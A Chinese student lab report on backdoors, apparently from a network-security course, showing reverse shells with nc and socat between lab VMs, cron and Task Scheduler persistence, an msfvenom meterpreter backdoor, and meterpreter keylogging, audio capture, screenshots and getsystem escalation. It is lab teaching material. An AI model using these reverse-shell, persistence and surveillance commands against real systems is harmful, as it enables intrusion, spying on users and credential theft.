1. 程式人生 > >Exp2 後門原理與實踐 20154301仉鑫燁

Exp2 後門原理與實踐 20154301仉鑫燁

編輯 lock 命令 兩臺 鎖定 com windows 程序 獲取

20154301《網絡對抗》Exp2 後門原理與實踐

20154301仉鑫燁

一、實驗內容

常用後門工具實踐:
  • Windows獲得Linux Shell:
  1. 在Windows下,先使用ipconfig指令查看win7虛擬機IP:
    技術分享圖片

  2. 使用ncat.exe程序監聽本機的4301端口:
    技術分享圖片

  3. Kali:使用nc指令的-e選項反向連接Windows主機的4301端口:
    技術分享圖片

  4. Windows下成功獲得了一個Kali的shell,運行ls指令如下:
    技術分享圖片

  • Linux獲得Windows Shell:
  1. 過程與之前的類似,在Kali環境下用ifconfig查看IP:
    技術分享圖片

  2. 使用nc指令監聽4301端口:
    技術分享圖片

  3. 在Windows下,使用ncat.exe

    程序的-e選項項反向連接Kali主機的4301端口:
    技術分享圖片

  4. Kali下可以看到Windows的命令提示,可以輸入Windows命令:
    技術分享圖片

  • 使用nc傳輸數據:
  1. Windows下監聽4301端口:
    技術分享圖片

  2. Kali下連接到Windows的4301端口:
    技術分享圖片

  3. 建立連接之後,就可以傳輸數據了,這裏傳輸的是字符串,相當於兩臺主機在聊天,也可以用重定向操作符來傳輸文件:
    技術分享圖片
    技術分享圖片

  • 使用netcat獲取主機操作Shell,cron啟動

  1. 先在Windows系統下,監聽4301端口:
    技術分享圖片

  2. 在Kali環境下,使用man crontab指令查看crontab命令的幫助文檔,從文檔中我們可以知道crontab指令可以用於設置周期性被執行的指令。該命令從標準輸入設備讀取指令,並將其存放於crontab

    文件中,以供之後讀取和執行。
    技術分享圖片

  3. crontab -e指令編輯一條定時任務,選擇編輯器時選擇基本的vim編輯器就行:
    (最後一行為44 * * * * /bin/netcat 192.168.108.131 4301 -e /bin/sh,意思是在每個小時的第44分鐘反向連接Windows主機的4301端口,此時時間為16:43)
    技術分享圖片

  4. 時間到16點44分,此時已經獲得了Kali的shell,可以輸入指令(如果在這之前輸入指令,屏幕上不會有顯示,但是等到了44分時會立馬顯示出來):
    技術分享圖片

  • 使用socat獲取主機操作Shell, 任務計劃啟動

    基礎知識:
    socatncat的增強版,它使用的格式是socat [options] <address> <address>
    ,其中兩個address是必選項,而options 是可選項。
    socat的基本功能就是建立兩個雙向的字節流,數據就在其間傳輸,參數address就是代表了其中的一個方向。所謂流,代表了數據的流向,而數據則可以有許多不同的類型,命令中也就相應需要許多選項對各種不同的類型數據流進行限定與說明。
  1. 在Windows系統下,打開控制面板->管理工具->任務計劃程序,創建任務,填寫任務名稱後,新建一個觸發器:
    技術分享圖片

  2. 在操作->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:4301 exec:cmd.exe,pty,stderr,這個命令的作用是把cmd.exe綁定到端口4301,同時把cmd.exe的stderr重定向到stdout上:
    技術分享圖片

  3. 創建完成之後,可以windows+L鎖定計算機讓它執行。
    技術分享圖片

  4. 此時,在Kali環境下輸入指令socat - tcp:192.168.108.131:4301,這裏的第一個參數-代表標準的輸入輸出,第二個流連接到Windows主機的4301端口,此時可以發現已經成功獲得了一個cmd shell:
    技術分享圖片

  • 使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

  1. 輸入指令
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=4301 -f exe > 20154301_backdoor.exe
    生成後門程序:
    技術分享圖片

  2. 通過‘nc‘指令將生成的後門程序傳送到Windows主機上:
    技術分享圖片

  3. 在Kali上使用msfconsole指令進入msf控制臺,使用監聽模塊,設置payload,設置反彈回連的IP和端口:use exploit/multi/handler set payload windows/meterpreter/reverse_tcp
    技術分享圖片

  4. 設置完成後,執行監聽:
    技術分享圖片

  5. 打開Windows上的後門程序:20154301_backdoor.exe
    技術分享圖片

  6. 此時Kali上已經獲得了Windows主機的連接,並且得到了遠程控制的shell:
    技術分享圖片

  • 使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

  1. 使用record_mic指令截獲一段音頻:
    技術分享圖片

  2. 使用webcam_snap指令可以使用攝像頭進行拍照:(電腦沒有色相頭!!)
  3. 使用screenshot指令可以進行截屏:
    技術分享圖片

  4. 使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄:
    技術分享圖片
    技術分享圖片

  5. 先使用getuid指令查看當前用戶,使用getsystem指令進行提權,如圖所示,提權成功:
    技術分享圖片

Exp2 後門原理與實踐 20154301仉鑫燁